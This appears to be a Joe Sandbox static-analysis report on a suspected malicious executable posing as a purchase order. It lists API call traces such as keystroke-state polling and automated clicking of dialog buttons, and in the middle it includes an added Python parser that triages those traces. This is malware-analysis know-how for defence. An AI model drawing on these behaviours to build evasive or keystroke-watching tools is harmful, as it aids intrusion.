                                  • API String ID: 2591440241-0
                                  • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                  • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                  • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                  • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                  APIs
                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                  • _wcslen.LIBCMT ref: 00461683
                                  • __swprintf.LIBCMT ref: 00461721
                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                  • GetDlgCtrlID.USER32(?), ref: 00461869
                                  • GetWindowRect.USER32(?,?), ref: 004618A4
                                  • GetParent.USER32(?), ref: 004618C3
                                  • ScreenToClient.USER32(00000000), ref: 004618CA
                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                  • String ID: %s%u
                                  • API String ID: 1899580136-679674701
                                  • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                  • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                  • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                  • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                  APIs
                                  • 7427A570.USER32(00000000,?,?), ref: 0043143E
                                  • 74284C00.GDI32(00000000,?,?), ref: 0043144F
                                  • 74284C40.GDI32(00000000), ref: 00431459
                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: 74284$7427A570BitsObjectSelectStretch
                                  • String ID: (
                                  • API String ID: 2829590553-3887548279
                                  • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                  • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                  APIs
                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  Similarity
                                  • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                  • API String ID: 1976180769-4113822522
                                  • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                  • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                  • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                  • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                  Similarity
                                  • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                  • String ID:
                                  • API String ID: 461458858-0
                                  • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                  • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                  • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                  • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                  • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                  • CloseHandle.KERNEL32(00000000), ref: 00430113
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                  • GlobalFree.KERNEL32(00000000), ref: 00430150
                                  • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                  • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                  • DeleteObject.GDI32(?), ref: 004301D0
                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                  Similarity
                                  • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                  • String ID:
                                  • API String ID: 3969911579-0
                                  • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                  • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                  • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
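The function blocks above are Joe Sandbox's static API trace, one block per disassembled function: each bullet names the imported API, its module, the argument values the sandbox could resolve ("?" where it could not) and the call-site address. Reading hundreds of these by hand is slow, so the following added example (my code, not part of the Joe Sandbox report or of the analysed sample) parses that bullet layout into records, splits it into blocks at each "APIs" header, decodes the handful of window-message constants it knows (WM_CLOSE, BM_CLICK, STM_SETIMAGE, ...) and tags blocks against a small watch-list. The watch-list groupings and the SAMPLE text (constructed from lines of this report) are assumptions for illustration; the sandbox's "API ID" / "String ID" Similarity fields are kept as opaque metadata.

```python
"""Parser and triage pass for Joe Sandbox function-block API listings.

Added example, not part of the Joe Sandbox report or of the analysed sample.
Assumes the bullet layout rendered on this page, e.g.
    • GetDriveTypeW.KERNEL32 ref: 0045DB32
      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
"?" marks an argument the sandbox could not resolve statically.
"""
from __future__ import annotations
import re
from dataclasses import dataclass, field

API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
SIM_LINE = re.compile(
    r"^\s*•\s*(?P<key>API String ID|API ID|String ID|Opcode ID|Instruction ID):\s*(?P<val>.*)$"
)
# Only a few well-known window messages are named; anything else is left as hex.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x00C2: "EM_REPLACESEL", 0x00F5: "BM_CLICK",
                   0x0111: "WM_COMMAND", 0x0172: "STM_SETIMAGE"}
# Watch-list (my grouping, not Joe Sandbox's): tagged when a block calls every API in the set.
BEHAVIOURS = {
    "mci_control": {"mciSendStringW"},
    "picture_load_via_ole": {"CreateFileW", "ReadFile", "CreateStreamOnHGlobal", "OleLoadPicture"},
    "ui_automation": {"FindWindowExW", "SetActiveWindow", "SendMessageW"},
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int                        # address of the call site
    subcall_of: int | None = None   # set for "Part of subcall function XXXXXXXX" entries


@dataclass
class FunctionBlock:
    calls: list[ApiCall] = field(default_factory=list)
    meta: dict[str, str] = field(default_factory=dict)  # Similarity fields (API ID, String ID, ...)

    def api_names(self) -> set[str]:
        return {c.api for c in self.calls}


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split the listing at each 'APIs' header; collect API calls and Similarity metadata."""
    blocks = [FunctionBlock()]
    for raw in text.splitlines():
        if raw.strip() == "APIs":
            if blocks[-1].calls or blocks[-1].meta:
                blocks.append(FunctionBlock())
            continue
        m = API_LINE.match(raw)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            blocks[-1].calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                                            int(m["sub"], 16) if m["sub"] else None))
            continue
        s = SIM_LINE.match(raw)
        if s:
            blocks[-1].meta[s["key"]] = s["val"].strip()
    return [b for b in blocks if b.calls or b.meta]


def decode_messages(block: FunctionBlock) -> list[str]:
    """Name the message (2nd argument) of each SendMessageW call whose value is resolved."""
    names = []
    for c in block.calls:
        if c.api != "SendMessageW" or len(c.args) < 2:
            continue
        try:
            msg = int(c.args[1], 16)
        except ValueError:          # "?" or a symbolic argument: skip it
            continue
        names.append(WINDOW_MESSAGES.get(msg, f"0x{msg:04X}"))
    return names


def triage(block: FunctionBlock) -> list[str]:
    """Behaviour tags for a block: watch-list hits plus window-driving messages."""
    tags = [name for name, apis in BEHAVIOURS.items() if apis <= block.api_names()]
    msgs = decode_messages(block)
    if "BM_CLICK" in msgs or "WM_CLOSE" in msgs:
        tags.append("drives another window (BM_CLICK/WM_CLOSE)")
    return tags


# Constructed test input: three blocks copied from this report's listing.
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
Similarity
• String ID:
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
• GetDriveTypeW.KERNEL32 ref: 0045DB32
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
Similarity
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
APIs
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
• SetActiveWindow.USER32(00000000), ref: 00443BEC
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
• SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
"""

if __name__ == "__main__":
    for i, b in enumerate(parse_blocks(SAMPLE)):
        print(f"block {i}: {sorted(b.api_names())}")
        print(f"  messages={decode_messages(b)} tags={triage(b)}")
```

Run against the page text (copy the listing into a file and feed it to parse_blocks), the third sample block comes out tagged as UI automation that posts BM_CLICK and then WM_CLOSE to a BUTTON window it located with FindWindowExW, which is the kind of block worth opening in the disassembler before the hundreds of string-formatting and GUI helpers around it. Unknown messages stay as hex so nothing is silently mislabelled; extend WINDOW_MESSAGES only with constants you have verified.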
                                  Similarity
                                  • API ID: Menu$Delete$DestroyItemObject$74285CountCursorDrawInfo
                                  • String ID: 0
                                  • API String ID: 125510622-4108050209
                                  • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                  • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                  • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                  • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                  Similarity
                                  • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                  • String ID: 0.0.0.0
                                  • API String ID: 1965227024-3771769585
                                  • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                  • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                  • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                  • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                  Similarity
                                  • API ID: SendString$_memmove_wcslen
                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                  • API String ID: 369157077-1007645807
                                  • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                  • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                  • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                  • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                  APIs
                                  • GetParent.USER32 ref: 00445BF8
                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                  • __wcsicoll.LIBCMT ref: 00445C33
                                  • __wcsicoll.LIBCMT ref: 00445C4F
                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                  Similarity
                                  • API ID: __wcsicoll$ClassMessageNameParentSend
                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                  • API String ID: 3125838495-3381328864
                                  • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                  • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                  • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                  APIs
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                  • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                  • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                  • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                  • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                  • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                  Similarity
                                  • API ID: MessageSend$CharNext
                                  • String ID:
                                  • API String ID: 1350042424-0
                                  • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                  • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                  • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                  APIs
                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                  • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                  • _wcscpy.LIBCMT ref: 004787E5
                                  Similarity
                                  • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                  • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                  • API String ID: 3052893215-2127371420
                                  • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                  • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                  • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                  • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                  • __swprintf.LIBCMT ref: 0045E7F7
                                  • _wprintf.LIBCMT ref: 0045E8B3
                                  • _wprintf.LIBCMT ref: 0045E8D7
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-2354261254
                                  • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                  • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                  • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                  • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                  Similarity
                                  • API ID: __swprintf_wcscpy$__i64tow__itow
                                  • String ID: %.15g$0x%p$False$True
                                  • API String ID: 3038501623-2263619337
                                  • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                  • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                  • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                  • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                  APIs
                                  • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                  • __swprintf.LIBCMT ref: 0045E5F6
                                  • _wprintf.LIBCMT ref: 0045E6A3
                                  • _wprintf.LIBCMT ref: 0045E6C7
                                  Similarity
                                  • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                  • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                  • API String ID: 2295938435-8599901
                                  APIs
                                  • timeGetTime.WINMM ref: 00443B67
                                    • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                  • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                  • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                  • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                  • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                  • IsWindow.USER32(00000000), ref: 00443C3A
                                  • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                    • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                    • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                    • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                  • 74285940.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                  Strings
                                  Similarity
                                  • API ID: Window$Thread$MessageSendSleepTimetime$74285940ActiveAttachCurrentDialogFindInputProcess
                                  • String ID: BUTTON
                                  • API String ID: 1394735852-3405671355
                                  APIs
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                  • LoadStringW.USER32(00000000), ref: 00454040
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • _wprintf.LIBCMT ref: 00454074
                                  • __swprintf.LIBCMT ref: 004540A3
                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                  Strings
                                  Similarity
                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                  • API String ID: 455036304-4153970271
                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                  • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                  • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                  • _memmove.LIBCMT ref: 00467EB8
                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                  • _memmove.LIBCMT ref: 00467F6C
                                  • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                  • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                  Similarity
                                  • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                  • String ID:
                                  • API String ID: 2170234536-0
                                  APIs
                                  • GetKeyboardState.USER32(?), ref: 00453CE0
                                  • SetKeyboardState.USER32(?), ref: 00453D3B
                                  • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                  • GetKeyState.USER32(000000A0), ref: 00453D75
                                  • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                  • GetKeyState.USER32(000000A1), ref: 00453DB5
                                  • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                  • GetKeyState.USER32(00000011), ref: 00453DEF
                                  • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                  • GetKeyState.USER32(00000012), ref: 00453E26
                                  • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                  • GetKeyState.USER32(0000005B), ref: 00453E5D
                                  Similarity
                                  • API ID: State$Async$Keyboard
                                  • String ID:
                                  • API String ID: 541375521-0
                                  APIs
                                  • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                  • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                  • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                  • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                  • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                  • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                  • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                  • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                  • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                  • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                  Similarity
                                  • API ID: Window$ItemMoveRect$Invalidate
                                  • String ID:
                                  • API String ID: 3096461208-0
                                  APIs
                                  • 742845F0.USER32(?,000000F0), ref: 004714DC
                                  • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                  • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                  • DeleteObject.GDI32(?), ref: 0047151E
                                  • DestroyCursor.USER32(?), ref: 0047152C
                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                  • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                  • DestroyCursor.USER32(?), ref: 004715CD
                                  • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                  • DeleteObject.GDI32(?), ref: 004715EA
                                  • DestroyCursor.USER32(?), ref: 004715F8
                                  Similarity
                                  • API ID: CursorDestroyMessageSend$DeleteImageLoadObject$742845ExtractIcon
                                  • String ID:
                                  • API String ID: 614556818-0
                                  APIs
                                  Similarity
                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                  • String ID:
                                  • API String ID: 136442275-0
                                  APIs
                                  • _wcsncpy.LIBCMT ref: 00467490
                                  • _wcsncpy.LIBCMT ref: 004674BC
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcstok.LIBCMT ref: 004674FF
                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                  • _wcstok.LIBCMT ref: 004675B2
                                  • 758ED0D0.COMDLG32(00000058), ref: 00467774
                                  • _wcslen.LIBCMT ref: 00467793
                                  • _wcscpy.LIBCMT ref: 00467641
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _wcslen.LIBCMT ref: 004677BD
                                  • 758ED1A0.COMDLG32(00000058), ref: 00467807
                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                  Strings
                                  Similarity
                                  • API ID: _wcslen$_memmove_wcscpy_wcsncpy_wcstok$__getptd
                                  • String ID: X
